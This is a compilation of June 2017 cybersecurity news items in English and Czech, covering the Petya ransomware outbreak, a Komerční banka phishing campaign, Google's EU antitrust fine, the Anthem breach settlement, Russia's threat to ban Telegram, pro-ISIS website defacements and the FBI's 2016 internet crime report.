At a Cisco event in Las Vegas on Monday, Apple Chief Executive Officer Tim Cook reportedly said that the combination of technology Apple and Cisco offer should result in companies paying less for cyber insurance.

“If your enterprise or company is using Cisco and Apple, the combination should make that insurance cost significantly less for you,” Cook said. Cook made an appearance on stage at the Cisco Live 2017 show during Cisco CEO Chuck Robbins’ keynote address.

Apple and Cisco have been working together on cyber-security related areas for a couple of years. Earlier this month, they extended their “fast-lane” initiative to include business critical apps for macOS. The project is meant to help validate applications and devices that are optimized for Cisco networks.

Over the past years, Cisco has significantly increased its efforts in the cyber security area and appears determined to invest even more. More information on its plans should become public shortly, Ulevitch says: “This is just the beginning — stay tuned for more details in the coming months.”


Počítačový virus zasáhl světové firmy a snaží se je vyřadit z provozu

27.6.2017 Novinky/Bezpečnost Viry
Firmy v řadě evropských zemí se v úterý staly terčem kybernetického útoku. Postižena byla dánská přepravní společnost Maersk či ruský ropný gigant Rosněfť. Obzvláště rozsáhlý byl útok na Ukrajině, kde se terčem staly pošta, největší distribuční energetická společnost UkrEnergo i centrální banka.
Postižen byl americký nadnárodní potravinářský koncern Mondelez, přední přepravce Maersk, francouzský výrobce stavebnin St. Gobain, ruská ropná společnost Rosněfť, britská reklamní firma WPP či výrobce letadel Antonov.

Akce neidentifikovaných útočníků podle prohlášení napadených institucí na Ukrajině narušily jejich operace. Postižena byla státní pošta, největší státem vlastněná banka Oschad bank, největší energetický distributor UkrEnergo a alespoň částečně i vládní počítačová síť.

Centrální banka uvedla, že se stala terčem „neznámého viru“, a v prohlášení dodala, že věří, že je proti kyberútokům dostatečně zabezpečená. Ruský Rosněfť musel kvůli útoku přejít na rezervní řídicí systém.

Podle agentury Interfax-Ukrajina se virus chová podobně jako vyděračský virus WannaCry, jehož původci po napadených požadovali výkupné. To pro stanici BBC potvrdil i počítačový expert z Univerzity v Surrey Alan Woodward.

„Zdá se, že je to verze vyděračského viru (ransomware), který se objevil loni. Zločinci ho počátkem letošního roku zaktualizovali, když došlo k porážce některých jeho aspektů. Ten ransomware se nazýval Petya a jeho aktualizovaná verze Petrwap,“ uvedl Woodward.


Cloudflare Launches New App Store for Websites, $100 Million Development Fund

27.6.2017 securityweek Safety

Cloudflare Launches New Website App Store and Partners With Venture Firms to Launch $100 Million Development Fund

In December 2016 Cloudflare acquired Eager, a firm with a system for developing apps and integrating them into websites. The outcome of that acquisition is launched today with Cloudflare Apps, a free platform that enables developers to build apps and make them available to the 6 million websites that use the Cloudflare network.

In effect, Cloudflare is relaunching its own app store; but in a format that it now intends to grow. It has partnered with its first three venture capital investors to support app developers from a new $100 million Cloudflare Development Fund. Qualified developers will now have the opportunity to receive a cash investment, marketing support, and technical advice from the participating venture capital partners.

That financing is in the same tradition as that used by Sun when it launched Java, by Apple when it launched the Apple Apps Platform, and by Salesforce when it launched force.com. "When we discussed our plans with our investors," Matthew Prince, co-founder and CEO of Cloudflare, told SecurityWeek, "it was their idea to establish financing to help developers produce the next big idea in value-added apps. Now, if a developer is interested in building some new app only made possible by the Cloudflare network, it can apply for financing to help make it possible."

The investors concerned are New Enterprise Associates (NEA), Venrock, and Pelion Venture Partners. Cloudflare's app platform is an exciting opportunity for developers and investors," commented Bryan Roberts, Partner, Venrock. "Building on the success of other app platforms like Java and the iPhone App Store, Cloudflare is giving entrepreneurs the opportunity to rethink and shape how the next generation of Internet companies get built."

Cloudflare has long offered a few apps, but nothing that could be called a serious app store. This new venture is intended to change that with a completely new platform. "The Apps Platform is a collection of APIs that allow developers to easily produce apps that can run across the network," Prince told SecurityWeek. "It's similar to the platform built by Apple. We make it easy for the developers to produce apps, and easy for them to get paid for those apps. The existing apps will continue to work; but we believe this will enable a whole new class of website apps that couldn't exist without a network like Cloudflare that can efficiently deploy the code globally. The platform allows developers to take advantage of Cloudflare resources around the world, and then be able to make it much easier for anyone, whether a small niche WordPress site or a large organization, to use those apps."

"When you build a startup, you need three things: a way to efficiently reach customers, a way to get paid, and capital to finance your development," explained Prince. Together the Cloudflare Apps Platform and Development Fund solve these three challenges."

The Cloudflare network comprises some 6 million website customers that use Cloudflare's approximately 115 worldwide data centers for security -- such as DDoS mitigation-- and performance optimization. The basic service is free, but more advanced options can be paid for.

The new app service will add app code to delivered customer web pages as the page passes through Cloudflare's data centers. This provides both flexibility and control. Developed apps can be added to websites by customers simply by specifying which sites or pages on which they should run. For the customer, everything is automatic and requires zero coding.

Traditionally, of course, apps provide vulnerabilities. Android itself, for example, is quite secure -- it is that Android apps that can introduce problems to the Android ecosphere. SecurityWeek asked Prince if the new app platform could introduce vulnerabilities either to the Cloudflare network, or its customers.

Potentially, yes, he admitted; but then explained Cloudflare's approach -- which is closer to Apple than it is to Android. "We've taken an approach similar to Apple. We review all apps before deployment, and each one is individually sandboxed and cannot affect any other app," he explained. The control element comes because no code is ever installed on the customer's website, merely added to the page between the website and the viewer's browser. This makes it even stronger than the walled garden, because without hacking Cloudflare itself, there is no possible equivalent to the iOS weak point, sideloading.

"If a vulnerability is ever discovered, much like Apple we can withdraw that application from any customer that is using it and prevent any other customer from using it in the future. So, while there is a potential that an app vulnerability may slip through the vetting and the static analysis that we do before it is delivered, it is never deployed software. The app is code that is running on our hardware and injected into web pages as they pass through our systems; and we can simply turn it off without any effect on the customer's website."

"VigLink [one of the three VC investors] has always focused on empowering publishers, and the launch of Cloudflare Apps is a watershed moment," enthuses Oliver Roup, CEO and founder. Incremental publisher revenue is delivered without compromising user experience, now a single click away from more than 4 million of the web's savviest publishers. A better Internet isn't just faster and safer, it's more lucrative too."


Russian Oil Giant Rosneft Says Hit by 'Powerful' Cyberattack

27.6.2017 securityweek CyberWar
Russian oil giant Rosneft said Tuesday that its servers had suffered a "powerful" cyberattack, as the company is locked in a bitter court fight with the Russian conglomerate Sistema.

"A powerful hacking attack has been carried out against the company's servers," Rosneft said on Twitter, adding that it "hopes" the incident was "not connected to current legal proceedings".


China Agrees to Fight Corporate Hacking in Canada

27.6.2017 securityweek BigBrothers
China has pledged not to carry out state-sponsored cyberattacks against the intellectual property of Canadian firms, the two sides said Monday.

The agreement was reached as part of ongoing bilateral security and trade talks.

Western governments have accused Chinese hackers of stealing valuable proprietary technologies and business secrets from high-tech and pharmaceutical companies, as well as manufacturers.

Beijing has publicly denied wrongdoing.

China and Canada "agreed that neither country's government would conduct or knowingly support cyber-enabled theft of intellectual property, including trade secrets or other confidential business information, with the intent of providing competitive advantages to companies or commercial sectors," an official statement said.

Beijing has recently signed similar agreements with Australia, Britain, the United States and others -- all of which had accused China of wrongdoing.

In Canada, the most serious case involved the alleged hacking in 2014 of the National Research Council (NRC), which the country's electronic eavesdropping agency said was conducted by "a highly sophisticated Chinese state-sponsored actor."

The NRC partners with Canadian companies and academics on cutting-edge science and technology projects.

The deal comes as Canada and China consider entering free trade negotiations, and following blowback over China's recent purchases of Canadian companies.

Polls show Canadians are overwhelmingly wary of increased trade ties with China.

Opposition parties meanwhile raised concerns over the sale to China of two Canadian satellite and laser technology firms that also sell to Western militaries.

The bilateral security and trade talks held last week also touched on "mutual concerns" about rule of law issues, counter-terrorism, and combating transnational organized crime, the two sides said.

Beijing is pushing for an extradition treaty with Canada, but Ottawa has said it needs assurances that persons who are extradited get a fair trial and do not face the death penalty.


Google Gets Record-Breaking $2.7 Billion Fine for Manipulating Search Results
27.6.2017 thehackernews IT
Google has just lost its biggest regulatory battle!
Google has been hit with a record-breaking $2.7 billion (€2.42 billion) fine by the European antitrust officials for unfairly manipulating search results since 2008.
After a lengthy seven-year investigation that was launched in 2010 after several rivals complaint, the European Commission on Tuesday imposed this 'biggest even financial penalty' against the internet tech giant for breaking EU competition law.
by using its search dominance to distort search-engine results to promote own shopping comparison service at the top of all search results.
"Comparison shopping services rely to a large extent on traffic to be competitive." European Commission says in a press release.
"The evidence shows that consumers click far more often on results that are more visible, i.e. the results appearing higher up in Google's search results. More traffic leads to more clicks and generates revenue."
The Commission says the amount of penalty has been calculated from Google’s income from its comparison shopping service in Europe. Google’s total revenue in the year 2016 was almost $90 Billion.

Apart from the fine, the Commission has ordered Google to "stop its illegal conduct" and anti-competitive practices within the 3-month deadline or warned to face a further penalty of up to 5% of the average daily worldwide turnover of the Alphabet, Google's parent company."
So now Google will have to change its search ranking algorithm. However, the company can also appeal this decision in in EU courts to delay the resolution for years.
"We respectfully disagree with the conclusions announced today. We will review the Commission’s decision in detail as we consider an appeal, and we look forward to continuing to make our case." Google Spokesperson said in a statement.
Moreover, Google is currently facing two other ongoing EU antitrust investigations.
One says Google Android unfairly force cellphone manufacturers to preinstall Google services to promote its products over rivals. Another investigation targets its AdSense business.
The previous biggest antitrust fine was against U.S. chipmaker Intel in 2009, which was €1 billion.


Anthem agreed to pay $115m to settle a class-action suit brought on by the 2015 data breach
27.6.2017 securityaffairs  Incindent
Anthem, the largest US healthcare insurance company, has agreed to pay $115m to settle a class-action suit brought on by the 2015 data breach.

The attack on Anthem exposed 78.8 million records and according to experts that investigated the case, it was probably not a smash-and-grab raid but instead a sustained, low-key siphoning information over a period of months. The attack was conducted to stay below the radar of the company’s IT and security teams, using a bot infection to exfiltrate data out of the organization.

The records include names, dates of birth, addresses, and medical ID numbers, financial and medical records were not exposed.

Investigators reported that customized malware was used to infiltrate Anthem’s networks and steal data. The exact malware type was not disclosed but is reported to be a variant of a known family of hacking tools. However, an independent security consultancy reports that the attack may have been started up to three months earlier. The consultancy said that it noticed ‘botnet type activity’ at Anthem affiliate companies back in November 2014.

Back to the present, the settlement fund will cover costs incurred by victims of the breach.

According to the settlement’s “Alternative Compensation” section, customers who already received credit monitoring services can elect to receive a small cash compensation that ranges from $36 up to $50 in some instances.

The Judge Lucy Koh at District Court for the Northern District of California will review the proposal, it could be the largest data breach settlement in history if approved by the judge.

In March 2017, the US retail giant Target has entered a settlement with the US Attorneys General and it has agreed to pay $18.5 million over the 2013 data breach.

“After two years of intensive litigation and hard work by the parties, we are pleased that consumers who were affected by this data breach will be protected going forward and compensated for past losses,” lead attorney Eve Cervantez said.

Anthem Insurance-HQ-jpg

As is usually the case with settlements, Anthem will not have to admit to any wrongdoing.

The settlement was also generous with attorneys, a third of the package for a total amount of $37,950,000 will cover their fees.

Experian, who is handling the credit and identity monitoring services for the victims of the Anthem data breach, will receive an additional $17m.


Human error is the root cause of password reset email sent to AA customers
27.6.2017 securityaffairs  Safety

UK car insurance company AA accidentally sent out a ‘password update’ email to its customers, the incident was caused by a human error.
UK car insurance company AA accidentally sent out a “password update” email to its customers, the messages led the motorists to log into the motoring organization’s website to change their passwords. The concurrent access of a so large number of customers crashed the AA servers, then its customers couldn’t access their profiles, believing their accounts were compromised by hackers.

In reality, the incident was caused by a human error, according to AA no passwords had been changed and people couldn’t access their account because the server was flooded with access requests.

AA reset password

The AA company reassured its customers by confirming that the change password messages were sent out for error.

Follow
The AA ✔ @TheAA_UK
The email was sent by us, but in error. Your password hasn't been changed, and your data remains secure. Sorry for any confusion.
2:08 PM - 26 Jun 2017
9 9 Retweets 8 8 likes
Twitter Ads info and privacy
In a first time, the company confirmed that something of strange was happening to its customers, the message it posted on Twitter led use into believing that its customers were targeted by a phishing campaign.

Follow
The AA ✔ @TheAA_UK
We’re aware an email has been sent to members re password change Please don’t ring the number in the email. We’re looking into this urgently
10:05 AM - 26 Jun 2017
77 77 Retweets 19 19 likes
Twitter Ads info and privacy
Further investigation revealed the password reset messages were triggered by an error made by an internal,

Summarizing, if you are an AA customers ignore the password reset message sent by the company.


Gartner: Zaměřte se na tyto klíčové bezpečnostní technologie

27.6.2017 SecurityWorld Zabezpečení
Analytici společnosti Gartner sestavili výběr klíčových technologií pro oblast bezpečnosti, které byste neměli v tomto roce v žádném případě ignorovat.

První technologií, či spíše technologickou oblastí, jsou platformy pro ochranu cloudových řešení (Cloud Workload Protection Platforms – CWPP), jež nabízejí ucelený způsob, jak ochránit cloudovou infrastrukturu napříč různými hybridními prostředími zahrnujícími privátní i veřejnou IaaS infrastrukturu několika poskytovatelů.

Na druhé pozici seznamu se umístila technologie vzdáleného prohlížeče (remote browser), která omezuje rizika útoků na prohlížeč jeho izolováním od zbytku uživatelského systému.

Jako třetí uvádějí analytici Gartneru techniky pro odlákání či odklonění útoků (deception) – tedy takové, které vytvářejí zástupný cíl či návnadu, odrážejí nebo narušují průběh útoku, případně oddalují jeho možný dopad a umožňují útok jednoznačně detekovat.

Detekce a odpověď na útoky na koncové body (Endpoint Detection and Response – EDR) rozšiřuje tradiční metody ochrany koncových bodů (například antiviry) o funkce založené na monitorování událostí, neobvyklého chování či aktivit s možným zlým úmyslem – analytici odhadují, že EDR bude v roce 2020 využívat 80 % velkých podniků, 25 % středních firem a 10 % malých organizací.

Mezi techniky v podnicích o něco více rozšířené patří analýza provozu na síti (Network Traffic Analysis – NTA) sledující provoz, toky dat, připojení a objekty z hlediska chování naznačujícího možný útok.

Firmy, které chtějí lépe zvládat detekci hrozeb, reakce na incident a průběžné monitorování, ale nemají na to potřebné specialisty, by se měly zajímat o řízenou detekci a odezvu (Managed Detection and Response – MDR) – jde o službu populární zejména u středně velkých podniků, které nechtějí do oblasti detekce a reakce na incidenty příliš investovat.

Mezi užitečné funkce, které přináší rostoucí míra virtualizace datových center – zejména jejich síťových funkcí – patří mikrosegmentace (microsegmentation), tedy vytvoření poměrně malých oddělených segmentů, které v případě útoku omezuje škody pouze na velmi malou oblast.

Také virtuální, ovšem výrazně odlišné jsou softwarově definované perimetry (Software-Defined Perimeters – SDP), logické bezpečné enklávy zahrnující více vzdálených účastníků. Jejich zdroje a komponenty jsou obvykle skryté a lze k nim přistupovat pouze pomocí důvěryhodné služby (trust broker), čímž se snižuje riziko útoku.

Spolu s tím, jak se zvětšuje počet aplikací provozovaných modelem SaaS a jejich uživatelů, pak roste na významu také zprostředkování zabezpečeného přístupu ke cloudu (Cloud Access Security Broker – CASB) nabízející sjednocení dohledu nad několika cloudovými službami.

Agilita už ale dávno nestojí jen na cloudových aplikacích, a tak i do oblasti bezpečnosti pronikají principy DevOps, respektive DevSecOps, tedy řízení rizika a souladu s předpisy v rámci nástrojů a procesů agilního vývoje. Jde především o analýzu skladby softwaru a bezpečnostní skenování open source pro DevSecOps (OSS Security Scanning and Software Composition for DevSecOps).

Konečně poslední technologií z oblasti informační bezpečnosti, které by manažeři IT měli věnovat pozornost, je zabezpečení kontejnerů (container security) – ty totiž používají model sdíleného operačního systému a případná zranitelnost v hostitelském OS tak může znamenat zranitelnost všech kontejnerů.

Podle analytiků není problém v tom, že by kontejnery nebyly z podstaty bezpečné, ale v tom, že jsou často vývojáři nasazovány způsoby, které nejsou dostatečně bezpečné – a děje se tak obvykle mimo dohled týmů pro informační bezpečnost či bezpečnostních architektů.

Tradiční bezpečnostní nástroje jsou navíc vůči kontejnerům „slepé“. Naopak bezpečnostní řešení určená pro kontejnery jsou navržena tak, aby řešila ochranu v rámci celého životního cyklu a funkce typu předprodukčního skenování i monitorování a ochrany za chodu.


Českem se šíří další vlna phishingu. Podvodný e-mail se vydává za zprávu KB
27.6.2017 CNEWS.cz
  Phishing

Komerční banka varuje, že někdo jejím jménem a zfalšovanou adresou mojebanka@kb.cz zasílá podvodný e-mail upozorňující na příchozí mezinárodní SWIFT platbu. Podrobnosti má uživatel najít v příloze. V ní se však nachází 550kB soubor swift.jar, který obsahuje trojského koně Java/Kryptik.FF.

Kryptik je velmi starý trojan (šířil se ještě před rokem 2010), ale jeho javovskou variantu zařadil Eset na seznam hrozeb až v červnu. Není přesně zdokumentováno, co dělá, ale jako jiné Kryptiky může otevřít porty počítače a usnadnit přístup hackerům, rozesílat spam, zaznamenávat psaní na klávesnici apod. Nebo jen otevře systém pro šíření dalšího malwaru.

Phishing tvářící se jako zpráva Komerční banky
Phishing tvářící se jako zpráva Komerční banky


Microsoft reaguje na Kasperského. Většinu obvinění smetl ze stolu

27.6.2017 CNEWS.cz  Software
Microsoft tvrdí, že podporuje bohatý ekosystém bezpečnostních řešení a s výrobci antivirů spolupracuje, aby jejich produkty ve Windows fungovaly.
Kaspersky Lab není spokojený s Windows v otázce přístupu k antivirovým řešením a začátkem června podal podnět k prošetření Evropské komisi. Na toto téma si můžete na Cnews přečíst rozsáhlé články, ale také poslechnout pár dní starý podcast. Před pár dny Microsoft na výrobce bezpečnostního řešení zareagoval na blogu Windows Security.

Příspěvek je dlouhý, v kostce ale říká, že se Microsoft snaží vytvořit bezpečný operační systém a za tento přístup se „nestydí“.

Detekční schopnosti Defenderu

Součástí bezpečného vydání Windows je pak antivirus pro ochranu před malwarem. Eugen Kaspersky poukázal na to, že toto řešení v minulosti na relativní rovině získávalo slabší hodnocení než konkurence. Microsoft se však odkazuje na květnový test, který by měl odrážet reálné podmínky ve světě.

Podle AV Comparatives si nejen v něm, ale obecně v posledních měsících Defender vedl dobře a zachytil přes 99 % škodlivých kódů. (Jen v únoru však šlo o 96,6 %.) Připomínám ale, že samotné testy nemusí mít z komplexního hlediska zabezpečení vysokou vypovídající hodnotu. Testy i většinu antivirů zpochybnil před několika měsíci bývalý zaměstnanec Mozilly.

Problematika rychlého vývoje a upgradů

Microsoft reaguje na údajnou nedostupnost testovacích verzí Windows tím, že jednak vydává pravidelně nová sestavení veřejně skrze program Windows Insider, jednak spolupracuje s tvůrci antivirových řešení a identifikuje významné změny v systému. Podle Microsoftu je vývoj transparentnější než dřív a s ohledem na rychlejší vývoj zdvojnásobil snahu o podporu výrobců.

Např. v době, kdy uvolnil Creators Update, zhruba 95 % antivirů používaných na strojích s Desítkami bylo s touto verzí kompatibilní. Microsoft dále tvrdí, že pro ty případy, kdy antivirus kompatibilní není, vytvořil funkci, jež zajistí, že po provedení upgradu jsou uživatelky a uživatelé vyzváni k instalaci nejnovější verze antiviru. Původní ochrana je však vypnuta, aby upgrade mohl proběhnout.

Zatímco Kaspersky tvrdí, že Microsoft antiviry prostě odebere, Microsoft zase říká, že dotyčného uživatele či uživatelku vyzve k instalaci kompatibilní verze. Dokonce má pro tyto účely vytvořený seznam kompatibilních verzí, na němž spolupracuje s výrobci bezpečnostních řešení, aby bylo jednoznačné, které verze bezpečnostních produktů jsou kompatibilní s novými verzemi Windows, a kam mají být uživatelky a uživatelé nasměrováni pro upgradu.

Co když licence vyprší?

Microsoft dále uvádí, že pokud je nainstalovaná ochrana třetí strany funkční, Defender bez schválení neprovádí žádné akce. Zapne se však, pokud ochrana přestane fungovat např. kvůli vypršení licence. Nechráněné počítače Redmondští nechat nechtějí. Kaspersky si stěžoval na to, že nemůže použít vlastní oznámení o vypršení licence. Podle Microsoftu ale bylo opět ve spolupráci s výrobci antivirů standardizovanou sadu oznámení, která dávají na srozuměnou, že licence brzy vyprší.

Jedná se také o větší oznámení, které se objeví v popředí ve středu obrazovky. Ačkoli Kaspersky podle všeho opravdu nemůže použít své blikající a červení vykřičníky zobrazující upozornění, zobrazují se neutrální, ale dostatečné výrazná oznámení o vypršení licenci. Kdo chce, licenci si prodlouží. (Navázat by mohla diskuze o jednání pod nátlakem.)

Většinu nařčení Kasperskyho tak Microsoft smetl ze stolu. Zůstávají pouze výtky k tomu, aby Windows Defender v hlavním okně netvrdil, že je počítač nezabezpečený ve chvíli, kdy je funkční jiná ochrana. V Creators Updatu však bylo starší rozhraní nahrazeno Centrem zabezpečení a budu muset ještě ověřit, zda se i toto prostředí vymezuje vůči funkční ochraně od třetí strany.


Podvodné e-maily se snaží napálit klienty Komerční banky

27.6.2017 Novinky/Bezpečnost Phishing
Na pozoru by se měli mít uživatelé internetového bankovnictví od Komerční banky. Zaměřili se na ně totiž počítačoví piráti, kteří se snaží propašovat do jejich počítačů škodlivý virus. V dalším kroku se je pak snaží připravit o peníze.
Ukázka podvodného e-mailu
Ukázka podvodného e-mailu
„Aktuálně jsme zaznamenali podvodné e‑maily, jejichž cílem je zavirovat váš počítač. Podvodný e‑mail se tváří, že je odeslán z e-mailové adresy mojebanka@kb.cz,“ varovali zástupci Komerční Banky.

V předmětu zprávy je uveden text „Informace o platbě“. Počítačoví piráti se snaží v příjemci podvodné zprávy vzbudit dojem, že uživateli byla z účtu stržena nějaká platba. Podrobnosti mají lidé naleznout v příloze e-mailu.

Právě v tom je ale kámen úrazu. „Namísto slibovaných podrobností, soubor v příloze obsahuje počítačový virus, který se po spuštění nainstaluje do vašeho počítače. Důrazně vás varujeme před otevíráním tohoto e‑mailu a přílohy,“ konstatovali zástupci banky.

Piráti jsou jen krůček od peněz
Prostřednictvím viru jsou počítačoví piráti už jen krůček od peněz, které jsou uloženy na bankovním účtu. Stačí jim již pouze získat potvrzovací SMS zprávu, aby mohli uskutečnit prakticky jakoukoliv platu. A zotročit v dnešní době smartphone není bohužel vůbec žádný problém.

„V případě, že jste výše uvedený e‑mail obdrželi nebo se setkali s jakýmkoli jiným podezřelým e‑mailem a otevřeli jej, případně otevřeli přílohu v něm obsaženou, neprodleně kontaktuje naši klientskou linku internetového bankovnictví 955 551 552,“ podotkli zástupci banky.

V současné době podobné zprávy cílí výhradně na klienty Komerční banky. Není nicméně vyloučeno, že se taktika kyberzločinců v dohledné době změní a budou se snažit prostřednictvím nevyžádaných e-mailů napálit klienty i jiné banky.


Russian Gov is threatening to ban Telegram because it refused to comply data protection laws
27.6.2017 securityaffairs CyberWar

Russia threatens to ban the Telegram instant messaging app because the company refused to be compliant with the country’s new data protection laws.
The Russian Government is threatening to ban the popular Telegram instant messaging app because the company refused to be compliant with the country’s new data protection laws.

Telegram has 6 million Russian users and in order to protect their privacy, the company refused to comply with the data protection laws.


The Russian Personal Data Law was implemented since September 1st, 2015, it requests foreign tech companies to store the personal data of Russian citizens within the country. The Law was designed for protecting Russian citizens from surveillance activities of foreign agencies such as the NSA.

Since January 1, the new Russian Data Protection Laws request foreign tech companies to store past six months of the personal data of Russians and encryption keys within the country. The companies are obliged to provide the access to the retained data if requested by authorities.

“There is one demand, and it is simple: to fill in a form with information on the company that controls Telegram,” Alexander Zharov said, head of communications regulator Roskomnadzor (state communications watchdog).

“And to officially send it to Roskomnadzor to include this data in the registry of organizers of dissemination of information. In case of refusal… Telegram shall be blocked in Russia until we receive the needed information.”

According to the FSB, the Russian intelligence agency, the terrorists who killed 15 people in Saint Petersburg in April were communicating through the Telegram encrypted messaging service.

The Russian intelligence asked Telegram to share users’ chats and crypto keys on demand to allow government investigations on terrorists abusing the instant messaging app as a communication channel.

The use of the popular encrypted messaging app is widespread among the militants of the terrorist organization in Russia and abroad, The use of Telegram has eclipsed the use of other social media platforms, including Twitter.

Social media continue to ban the content posted by members of the ISIS in the attempt to block their propaganda online.

Twitter continues to close hundreds of thousands of accounts for violating the company’s policies on violent extremism. In August Twitter published a blog post that revealed it has shut down 360,000 terrorist-related accounts since last year.

The reason for the widespread use of Telegram is related to the lack repressive measures of the company against ISIS activities through its application.

“[Telegram is] the app of choice for many Isis, pro-Isis and other jihadi and terrorist elements.” states a report published by the Middle East Media Research Institute (MEMRI).

A previous report published by the MEMRI JTTM, titled “Jihadis Shift To Using Secure Communication App Telegram’s Channels Service” published October 29, 2015, noted that numerous jihadis and jihadi organizations had opened their own channels on Telegram.

Back to the present, the Telegram founder Pavel Durov confirmed that also other intelligence agencies asked for a backdoor in the popular encrypted messaging app.

10 Jun
Yasha Levine ✔ @yashalevine
No backdoor needed. Enough bugs to go around. But there is a lot of backroom chatter between crypto app makers and their USG backers. https://twitter.com/durov/status/872891017418113024 …
Follow
Pavel Durov ✔ @durov
@yashalevine During our team's 1-week visit to the US last year we had two attempts to bribe our devs by US agencies + pressure on me from the FBI.
1:45 PM - 11 Jun 2017
545 545 Retweets 481 481 likes
Twitter Ads info and privacy
Telegram wasn’t the only company targeted by Russian data protection laws, in November LinkedIn was banned in the country for not complying with the laws.


Pro-ISIS group defaced US Government websites in 3 states
27.6.2017 securityaffairs CyberWar

Several government websites were hacked by a pro-ISIS group that is calling itself Team System DZ, including those of the Ohio Governor John Kasich.
Several government websites in Ohio and Maryland, including the one belonging to Ohio Governor John Kasich, had to be shut down Sunday after being defaced by pro-ISIS hackers. The hackers breached the websites and published messages supporting the Islamic State group.

The message posted on Kasich’s website also played an Islamic call to prayer.

The Kasich website (www.governor.ohio.gov) was taken offline on Sunday, now it is up and running again.

pro-isis group defacement

The hackers belong to a group that is calling itself Team System DZ, the group targeted the websites in as retaliation for the politic of the US President Donald Trump.

“You will be held accountable Trump, you and all your people for every drop of blood flowing in Muslim countries,” “I Love Islamic state.” states the message posted by the group.

The hackers have written the message in gold lettering on a black background.

The hackers also published the basic statement of the Islamic faith written in Arabic:

“there is no god but Allah and Muhammad is the prophet of Allah.”

Tom Hoyt, a spokesman for the Ohio Department of Administrative Services, said all affected servers were “taken offline” and law enforcement is investigating the cyberattacks.

“We also are working with law enforcement to better understand what happened,” Hoyt said.

Hackers also targeted a website for Howard County, Maryland.

“There was no breach of data and no personal information was compromised,” according to a statement from Howard County Executive Allan H. Kittleman. “Howard County government is working with law enforcement agencies and an investigation is underway. We apologize for any inconvenience.”

“Government websites in Ohio, Maryland and New York have been hacked with what appears to be pro-ISIS propaganda.” reported the CNN.

“On Sunday, visitors to governor.ohio.gov were greeted with a black background and an Arabic symbol while an Islamic call to prayer played in the background.”
The official website for the Town of Brookhaven, New York, also was hacked and hackers published the same messages appeared on the other websites targeted by the pro-ISIS group.
Some of the websites are still down at the time I was writing.


FBI: $1.45 Billion in Losses to Internet Crime Reported in 2016

26.6.2017 securityweek CyberCrime
The FBI has published its Internet Crime Report 2016 based on information received by the Internet Crime Complaint Center (IC3). It shows that 298,728 complaints were received by the IC3 during 2016 (up from 288,012 in 2015); and that reported losses to internet crime totaled more than $1.45 billion (up from $1.07 billion in 2015).

These figures, however, are likely to be only a fraction of the full picture. The FBI estimates that only 15 percent of the nation's fraud victims report their crimes to law enforcement. Nevertheless, by publishing this report, the FBI hopes to help law enforcement recognize and respond to developing trends in internet crime, and to help the public recognize scams before they become victims.

FBI IC3 Report on Cybercrime

"The 2016 Internet Crime Report," writes Scott Smith, assistant director, cyber division of the FBI in the report's introduction, "highlights the IC3's efforts in monitoring trending scams such as Business Email Compromise (BEC), ransomware, tech support fraud, and extortion."

He also notes, "This year's report features a section on the importance of law enforcement collaboration and partnerships with the private sector and Intelligence Community. For example, the FBI continues to expand Operation Wellspring (OWS), an initiative through which state and local law enforcement officers are embedded in, and trained by, FBI cyber task forces and serve as the primary case agents on Internet-facilitated criminal investigations. Overall, OWS task forces opened 37 investigations in 2016 and have worked 73 total investigations since OWS was launched in August 2013."

The most prolific crimes detailed and analyzed in the report are business email compromise (BEC) and the personal equivalent, email Account compromise (EAC); ransomware; the tech support scam; and extortion.

The BEC scam, notes the report, "began to evolve in 2013 when victims indicated the email accounts of Chief Executive Officers or Chief Financial Officers of targeted businesses were hacked or spoofed, and wire payments were requested to be sent to fraudulent locations." Since then it has grown and evolved.

"In 2016, the scam evolved to include the compromise of legitimate business email accounts and requests for Personally Identifiable Information (PII) or Wage and Tax Statement (W-2) forms for employees." Last year, IC3 received 12,005 BEC/EAC complaints, with losses of more than $360 million.

Ransomware often receives greater publicity than BEC, but the instances and losses reported to IC3 are less than BEC losses. "Recent iterations," says the report, "target specific organizations and their employees, making awareness and training a critical preventative measure. In 2016, the IC3 received 2,673 complaints identified as ransomware with losses of over $2.4 million.

The tech support fraud is surprisingly pervasive and effective. Few people will not have received a tech support cold call; but the ease and speed with which they are detected and dismissed is not consistent across the whole population. "Once the phony tech support company or representative makes verbal contact with the victim, the subject tries to convince the victim to provide remote access to their device. Once the subject has control, additional criminal activity occurs."

That activity could include demanding a ransom, stealing sensitive personal information, or installing malware. A more recent variation of this fraud convinces the victim to allow access to refund an overpayment for earlier services. "With this access, the subject claims to have 'mistakenly' refunded too much money to the victim's accounts, and requests the victim wire the difference back to the subject company."

In reality, the fraudster used the provided access to effect the 'refund' from a different account belonging to the victim. The victim sees the 'refund', doesn't recognize it as his/her own money, and wires the requested funds to the fraudster.

The volume of money lost to this fraud is not as high as that of BEC or ransomware, but is personal rather than corporate money -- and can affect the victims more acutely. "In 2016," says the report, "the IC3 received 10,850 tech support fraud complaints with losses in excess of $7.8 million." Noticeably, older victims are often the most vulnerable.

"Extortion," says the report, "is defined as an incident when a cyber criminal demands something of value from a victim by threatening physical or financial harm or the release of sensitive data." Noticeably, ransomware (which is clearly a form of extortion) is excluded from this category. It includes DoS, hitman schemes, sextortion, Government impersonation schemes and loan schemes. "In 2016, the IC3 received 17,146 extortion-related complaints with adjusted losses of over $15 million."


Google Stops Scanning Gmail Content for Ad Targeting

26.6.2017 securityweek Privacy

Google on Friday announced plans to stop scanning the content of consumer Gmail addresses for personalizing the ads it serves to users.

Previously, the Internet giant would scan each and every email message received in consumer Gmail addresses, which allowed it to better determine what relevant ads to serve to its users. The only email accounts excluded from this practice were the Google Apps for Education and G Suite accounts.

Now, Google has decided to bring all accounts on the same page, and Diane Greene SVP, Google Cloud, announced in a blog post on Friday that consumer accounts will be aligned with the G Suite ones.

“G Suite’s Gmail is already not used as input for ads personalization, and Google has decided to follow suit later this year in our free consumer Gmail service. Consumer Gmail content will not be used or scanned for any ads personalization after this change,” Greene says.

As soon as the change will enter effect, ads displayed to users will be entirely based on their settings, in line with the manner in which the company personalizes ads for other Google products. Furthermore, users will be able to change their settings at all times, and can even disable ads personalization if they desire.

G Suite, which has seen great traction among enterprise users and has seen more than doubled usage among large business customers, will continue to be ad free. According to Google, over 3 million paying companies are using G Suite today.

Google’s free email service is very popular among consumers as well, and currently serves more than 1.2 billion users. To make Gmail even more appealing, Google also focused on improving user security and privacy.

In May 2017, the Internet giant rolled out a series of business-focused improvements to Gmail, including early phishing detection capabilities and "click-time warnings" for malicious links. In January, Google announced that Gmail will stop allowing users to attach JavaScript (.js) files to emails.


